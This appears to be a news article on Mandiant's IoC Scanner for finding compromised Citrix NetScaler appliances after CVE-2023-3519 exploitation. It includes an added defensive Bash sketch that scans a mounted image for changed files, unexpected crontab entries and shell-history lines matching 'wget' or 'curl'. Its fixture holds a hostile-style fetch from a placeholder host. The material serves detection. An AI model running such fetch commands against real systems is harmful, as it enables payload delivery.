With thousands of Citrix networking products still unpatched against a critical vulnerability and exposed on the Internet, Mandiant has released a tool to help enterprise defenders identify those that have been compromised.
The IoC Scanner is designed to be used with Citrix ADC and Citrix Gateway versions 13.1, 13.0, 12.1, and 12.0.
Citrix issued a patch for the critical zero-day vulnerability (CVE-2023-3519) in its NetScaler application delivery controller and gateway products on July 18, along with a recommendation that organizations using the affected products apply it immediately. The flaw can be exploited for unauthenticated remote code execution. Several threat groups are already actively exploiting it, installing web shells inside corporate networks and carrying out dozens of exploits.
Researchers say that nearly 7,000 instances remain exposed on the Web. Of those, around 460 have web shells installed, likely indicating compromise.
Mandiant’s tool, available on GitHub, can identify the file system paths of known malware, post-exploitation activity in shell history, unexpected crontab entries and processes, and known malicious terms and unexpected modification of NetScaler directories. The standalone Bash script can be run directly on a Citrix ADC appliance to scan files, processes, and ports for known indicators. (The tool must be run as root in live mode on the appliance.) It can also inspect a mounted forensic image to use in an investigation, Mandiant said.
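As an added illustration of the kinds of checks the article lists, and not Mandiant's scanner itself (whose code is on GitHub), the Bash sketch below sweeps an image mounted at a root path for three of them: files recently modified in a given directory, crontab lines absent from a known-good baseline, and shell-history lines matching supplied terms. The directory names, baseline, search terms, and the sample image it builds are constructed placeholders, not values from the article or the tool; for the modification-time check to be meaningful, a forensic image must be mounted with its original timestamps preserved.

```shell
#!/usr/bin/env bash
# Added example, not Mandiant's IoC Scanner: a minimal defender-side sweep of the
# kind the article describes, run against a NetScaler image mounted at ROOT
# (or "/" on a live appliance). All names below are constructed placeholders.
set -u

# Files under ROOT/DIR modified within the last DAYS days (unexpected directory changes).
recent_files() {            # recent_files ROOT DIR DAYS
  find "$1/$2" -type f -mtime -"$3" 2>/dev/null | sort
}

# Crontab lines (comments and blanks ignored) that do not appear in a known-good BASELINE.
crontab_unexpected() {      # crontab_unexpected CRONFILE BASELINE
  grep -vE '^[[:space:]]*(#|$)' "$1" | grep -vxF -f "$2" || true
}

# Shell-history lines matching any of the given TERMs, case-insensitively, with line numbers.
history_hits() {            # history_hits HISTFILE TERM...
  local hist=$1; shift
  local pat; pat=$(IFS='|'; echo "$*")
  grep -niE "$pat" "$hist" || true
}

# Build a constructed sample image so the sweep can be exercised offline.
make_sample_image() {
  local root; root=$(mktemp -d)
  mkdir -p "$root/webdir" "$root/etc" "$root/home"
  echo 'original page' > "$root/webdir/index.html"
  touch -t 202301010000 "$root/webdir/index.html"      # backdate the legitimate file
  echo 'dropped file'  > "$root/webdir/unexpected.php"  # a new file in a web directory
  printf '# system jobs\n0 3 * * * /usr/bin/backup\n*/5 * * * * /tmp/.unexpected\n' > "$root/etc/crontab"
  printf '0 3 * * * /usr/bin/backup\n' > "$root/etc/crontab.baseline"
  printf 'ls /var\nwget http://example.invalid/x\nnsconmsg -g\n' > "$root/home/.bash_history"
  echo "$root"
}

# Run the three checks against the constructed image and print what each flags.
demo() {
  local root; root=$(make_sample_image)
  echo "== files modified in the last day";   recent_files "$root" webdir 1
  echo "== crontab entries not in baseline";  crontab_unexpected "$root/etc/crontab" "$root/etc/crontab.baseline"
  echo "== history lines matching terms";     history_hits "$root/home/.bash_history" wget curl
  rm -rf "$root"
}
demo
```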
The IoC Scanner will do a “best-effort job” at identifying compromised products, but it may not be able to find all compromised devices or determine whether a device is vulnerable to exploitation, Mandiant said. “This tool is not guaranteed to find all evidence of compromise, or all evidence of compromise related to CVE 2023-3519,” according to the company.